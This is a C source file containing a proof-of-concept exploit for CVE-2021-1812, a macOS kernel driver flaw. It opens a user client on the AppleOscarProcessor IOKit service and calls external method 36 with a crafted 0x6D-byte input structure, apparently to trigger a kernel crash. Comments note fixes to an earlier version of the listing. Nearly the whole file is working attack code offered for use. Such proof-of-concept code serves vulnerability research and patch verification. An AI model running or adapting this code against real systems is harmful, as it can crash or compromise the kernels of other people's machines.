#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <CoreFoundation/CoreFoundation.h>
/* Minimal local declarations of the IOKit user-space entry points used by
 * main(); the real prototypes live in IOKit/IOKitLib.h, which this file does
 * not include (presumably to keep the listing self-contained). */
typedef mach_port_t io_object_t;
typedef io_object_t io_service_t;
typedef io_object_t io_connect_t;
/* Default master port used for service lookups. */
extern const mach_port_t kIOMasterPortDefault;
/* Drops the reference held on an IOKit object handle (service or connection). */
kern_return_t IOObjectRelease(io_object_t object);
/* Opens a user client of the given `type` on `service` for `task`; the new
 * connection handle is stored in `*client` on KERN_SUCCESS. */
kern_return_t IOServiceOpen(io_service_t service, task_t task, uint32_t type, io_connect_t *client);
/* Closes a connection previously returned by IOServiceOpen. */
kern_return_t IOServiceClose(io_connect_t client);
/* Returns the first registered service matching `matching`. The dictionary is
 * consumed (CF_RELEASES_ARGUMENT), so the caller must not release it again. */
io_service_t IOServiceGetMatchingService(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
/* Builds a matching dictionary for the IOKit class `name`; the result is
 * returned retained (CF_RETURNS_RETAINED) and is normally handed straight to
 * IOServiceGetMatchingService, which takes ownership. */
CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
/* Invokes external method `selector` on `client` with optional scalar and
 * structure input/output. `outCnt` and `outStructCnt` are in/out: capacity on
 * entry, bytes/entries actually produced on return. */
kern_return_t IOConnectCallMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt);
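/*
 * Proof-of-concept driver for CVE-2021-1812: opens a user client on the
 * "AppleOscarProcessor" service, calls selector 1 with no arguments, then
 * selector 36 with a 0x6D-byte input structure and a 0x1000-byte output
 * buffer, and prints the outcome.
 *
 * Returns 0 after both calls were issued (whatever their result), -1 when
 * the service could not be found or opened, or when a buffer could not be
 * allocated.
 *
 * Fixes relative to the original listing: the service handle and both
 * allocations are checked; `ret` is a kern_return_t; the heap buffers
 * themselves are passed to IOConnectCallMethod (the original passed
 * `&inputStr` / `&outStr`, the addresses of the 8-byte pointer variables,
 * while claiming sizes of 0x6D and 0x1000 bytes — an out-of-bounds read and
 * a potential stack overwrite in this process); and the connection, service
 * reference and buffers are released on every path.
 */
int main(void)
{
    int rc = 0;
    io_connect_t conn = MACH_PORT_NULL;
    uint8_t *outStr = NULL;
    uint8_t *inputStr = NULL;

    /* IOServiceMatching returns a retained dictionary that
     * IOServiceGetMatchingService consumes, so nothing to release here. */
    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                       IOServiceMatching("AppleOscarProcessor"));
    if (service == MACH_PORT_NULL) {
        printf("Can't find service\n");
        return -1;
    }

    int type = 0;
    kern_return_t ret = IOServiceOpen(service, mach_task_self(), type, &conn);
    if (ret != KERN_SUCCESS) {
        printf("Can't open connection ret: 0x%X\n", (unsigned)ret);
        rc = -1;
        goto out_release;
    }

    /* Sizes are byte counts; the buffers hold raw fill patterns, so they are
     * byte arrays rather than uint64_t arrays (0x6D is not a multiple of 8). */
    size_t outStrSz = 0x1000;
    size_t inputStrSz = 0x6D;
    outStr = malloc(outStrSz);
    inputStr = malloc(inputStrSz);
    if (outStr == NULL || inputStr == NULL) {
        printf("Out of memory\n");
        rc = -1;
        goto out_close;
    }
    memset(outStr, 0xBB, outStrSz);
    memset(inputStr, 0x41, inputStrSz);

    /* Selector 1, no scalar or structure arguments. */
    ret = IOConnectCallMethod(conn, 1, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL);
    if (ret)
        printf("won't panic\n");

    /* Selector 36 with the input structure and an output buffer; outStrSz is
     * updated by the kernel with the number of bytes actually returned. */
    ret = IOConnectCallMethod(conn, 36, NULL, 0, inputStr, inputStrSz,
                              NULL, NULL, outStr, &outStrSz);
    if (ret == KERN_SUCCESS)
        printf("Success\n");
    else
        printf("Failure: 0x%X %s\n", (unsigned)ret, mach_error_string(ret));

out_close:
    free(inputStr);
    free(outStr);
    IOServiceClose(conn);
out_release:
    IOObjectRelease(service);
    return rc;
}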